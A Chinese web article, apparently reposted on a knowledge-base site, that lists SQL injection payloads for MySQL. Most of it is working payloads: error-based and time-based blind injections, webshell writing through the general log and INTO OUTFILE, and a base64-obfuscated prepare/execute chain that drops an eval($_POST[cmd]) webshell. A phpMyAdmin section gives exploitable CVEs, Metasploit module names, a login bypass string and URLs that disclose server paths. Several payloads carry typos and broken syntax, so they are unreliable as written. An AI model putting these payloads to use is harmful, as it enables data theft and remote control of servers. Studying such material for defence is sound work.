商务合作
  1. Worktile社区首页
  2. 其他

SQL注入语法有哪些

亿速云 其他 阅读 714

仅供参考学习使用。

SQL注入语法

报错注入

updatexml(1,concat(0x7e,(select database()),0x7e),1)--+extractvalue(1,concat(0x7e,(select database()),0x7e),1)--+select count(*) from information_schema.tabeles group by concat((select database(),floor(rand(0)*2)select substr(version(),1,1)='X'select substring(version(),1,1)='X'

列名重复报错

select * from (select name_const(version(),1))a;select * from (select name_const((version()),1),name_const((select database()),1))a;select * from (select * from users a join users b)c;

数据溢出报错

select (select(!x-~0) from (select(select user())x)a);select ~0+!(select * from (select user())x);

几何函数报错

multipoint((select * from(select * from(select user())a)b));

case when 语句

select * from datadatabase() case id when 1 else 2 end

时间注入

if right((select database()),a,b)>'s' sleep(5)if assic(substr((select database()),a,b))=98 sleep(5)if assic(substr((select database()) from a to b))=98 sleep(5)if ord(mid((select database()),a,b))=98 sleep(5)
通过日志写shell
利用条件

已知物理路径,目录可写,root权限。

查看配置

show variables like '%general';

开启general log模式

set global general_log=on;

设置日志写shell地址*

set global general_log_file="/var/www/html/log.php";

写入shell

select "<?php phpinfo();>";

通过into outfile写shell

利用条件

已知物理路径,目录可写

select '<?php phpinfo();>' into outfile ‘/var/www/html/1.php'

通过导出表写入shell

use mysql;create table shell(shell1 text not null);insert into shell(cmd1) values('<?php phpinfo();>');select cmd1 from a into outfile '/var/www/html/1.php';

mysql from_base64函数利用

利用base64编码来加密,然后使用自定义变量接到,在使用prepare和EXECUTE来执行语句,完成日志写shell的操作。

set

set 用户定义一个变量,变量里面是sql可以执行的语句。

SQL注入语法有哪些

prepare

prepare name from value;

prepare 语句用于预备一个语句,并指定名称name,然后引用改语句。

SQL注入语法有哪些

execute

execute 语句用于执行预备的语句。

SQL注入语法有哪些

联合起来利用

set @sql1 = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg=='));/*set global general_log=on*/PREPARE name from @sql;EXECUTE name;set @sql2= (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZ19maWxlPSJDOlxcTVlPQVxcd2Vicm$9$vdFxcbG9naW4ucGhwIg=='));/*set global general_log_file="C:\MYOA\webroot\login.php"*/PREPARE name from sql2;EXECUTE name;select "<?php eval($_POST[cmd]); ?>";set @sql3 := (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZyA9IG9mZg=='));/*set global general_log = off*/PREPARE name from @sql3;EXECUTE name;

phpmyadmin 漏洞合集

phpmyadmin存在pregreplaceeval漏洞

影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 CVE-2013-3238

phpmyadmin存在serversync.php后门漏洞

影响版本 phpmyadmin v3.5.2.2

msf利用模块 : exploit/multi/http/phpmyadmin3522_backdoor CVE-2012-5159

phpmyadmin 配置文件/config/config.inc.php存在命令执行漏洞

影响版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1

msf利用模块:exploit/unix/webapp/phpmyadmin_config CVE-2009-1151

登录处漏洞

利用方法:用户名处写入’localhost’@’@”

影响版本:2.113/2.114

php爆绝对路径

phpMyAdmin/libraries/selectlang.lib.php

phpMyAdmin/darkblueorange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

感谢你能够认真阅读完这篇文章,希望小编分享的“SQL注入语法有哪些”这篇文章对大家有帮助,同时也希望大家多多支持亿速云,关注亿速云行业资讯频道,更多相关知识等着你来学习!

文章标题:SQL注入语法有哪些,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/23110

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
0 0
上一篇 2022年9月6日 上午12:06
下一篇 2022年9月6日 上午12:07

相关推荐

  • Burpsuit结合SQLMapAPI产生的批量注入插件是怎样的 其他

    Burpsuit结合SQLMapAPI产生的批量注入插件是怎样的

    1.1变动: 增加过滤设置 优化显示结果 增加运行提示信息 增加域名正则匹配 整个插件分为三个面板:任务面板、sqlmapapi参数配置面板、过滤条件面板。 任务面板 Server : SQLmapapi服务的IP和端口 THREAD:同时检测的任务数量 Domain:需要检测的域名,支持正则匹配 …

    亿速云的头像 亿速云
    2022年9月20日
    61700
  • 什么是单独的服务器 其他

    什么是单独的服务器

    摘要 独立服务器,通常被称为单独的服务器或物理服务器,是指完全为一个用户或组织独占使用的服务器。它与共享服务器环境或虚拟服务器不同,提供了更高的性能、安全性和控制权。主要特点包括:1、完全独占;2、高度定制性;3、更高的安全性以及4、性能优先。高度定制性意味着用户可以根据具体的应用需求和性能要求,定…

    worktile worktile
    2024年4月23日
    2800
  • pr如何修改视频分辨率 其他

    pr如何修改视频分辨率

    pr修改视频分辨率的方法: 1、首先进入pr,然后依次点击“新建项目”点击确定。 2、然后可以看到pr自带的多种选择可以自由选择分辨率。 3、还可以去通过设置,来自定义自己需要的剪辑尺寸。 4、可以根据需求来定义,哪怕是手机尺寸也可以。 5、设置好了可以点击“存储预设”来进行保存。 6、等到保存完成…

    亿速云的头像 亿速云
    2022年8月29日
    2.4K00
  • mysql在linux中2003错误如何解决 其他

    mysql在linux中2003错误如何解决

    解决方法:1、修改“my.cnf”文件,在“bind-address = 127.0.0.1”的前面添加“#”将其注释掉;2、在文件中添加“skip-external-lockingskip-name-resolve”;3、利用“service mysql restart”重新启动mysql服务即可…

    亿速云的头像 亿速云
    2022年9月18日
    49400
  • WebView File域同源策略绕过漏洞实例分析 其他

    WebView File域同源策略绕过漏洞实例分析

    基本知识Android架构 Kernel内核层 漏洞危害极大,通用性强 驱动由于多而杂,也可能存在不少漏洞 Libaries系统运行库层 系统中间件形式提供的运行库 包括libc、WebKit、SQLite等等 AndroidRunTime Dalvik虚拟机和内核库 FrameWork应用框架层 …

    亿速云的头像 亿速云
    2022年9月21日
    80300
  • Java Valhalla Project项目是什么 其他

    Java Valhalla Project项目是什么

    Valhalla项目的动机和原因 Oracle的Java语言架构师Brian Goetz在一次演讲中说,Valhalla项目的主要动机之一是希望使Java语言和运行时适应现代硬件。当Java语言诞生时(大约25年前撰写本文时),获取内存和算术运算的成本大致相同。 如今,这种情况已经发生了变化,内存提…

    亿速云的头像 亿速云
    2022年9月8日
    56700
  • javascript数值型只有一种吗 其他

    javascript数值型只有一种吗

    javascript数值型只有一种:浮点类型。JavaScript内部存储数字都是按64位浮点类型存储的,所以在JavaScript中实际上是没有整数类型的。按照JavaScript中的数字格式能够表示的整数范围为“[-2^53 ~ 2^53]”,包含边界值;但需要注意的是,数组索引、位操作符等使用…

    亿速云的头像 亿速云
    2022年9月24日
    58100
  • 如何用JAVA语言分析双重检查锁定 其他

    如何用JAVA语言分析双重检查锁定

    1、双重检查锁定 在程序开发中,有时需要推迟一些高开销的对象初始化操作,并且只有在使用这些对象时才进行初始化,此时可以采用双重检查锁定来延迟对象初始化操作。双重检查锁定是设计用来减少并发系统中竞争和同步开销的一种软件设计模式,在普通单例模式的基础上,先判断对象是否已经被初始化,再决定要不要加锁。尽管…

    亿速云的头像 亿速云
    2022年9月20日
    68100
  • Mysql中锁的使用场景是什么 其他

    Mysql中锁的使用场景是什么

    Mysql中锁的使用场景主要有:常见锁类型、Mysql引擎介绍、常用引擎间的区别、共享锁与排他锁、排他锁的实际应用、共享锁的实际应用、死锁的发生、另一种发生死锁的情景、死锁的解决方式、意向锁和计划锁、乐观锁和悲观锁。 一、常见锁类型 表级锁,锁定整张表 页级锁,锁定一页 行级锁,锁定一行 共享锁,也…

    亿速云的头像 亿速云
    2022年6月29日
    72200
  • jquery版本2.x和3.x的区别有哪些 其他

    jquery版本2.x和3.x的区别有哪些

    区别:1、2.x不再更新,官方只做BUG维护,功能不再新增;3.x是官方主要更新维护的版本,功能持续新增。2、3.x支持“for…of ”循环语句,2.x不支持“。3、2.x利用setInterval来实现动画,3.x支采用requestAnimationFrame()来实现动画。4、3…

    亿速云的头像 亿速云
    2022年9月8日
    1.3K00
注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部
PingCode智能化研发管理工具,25人以下免费使用。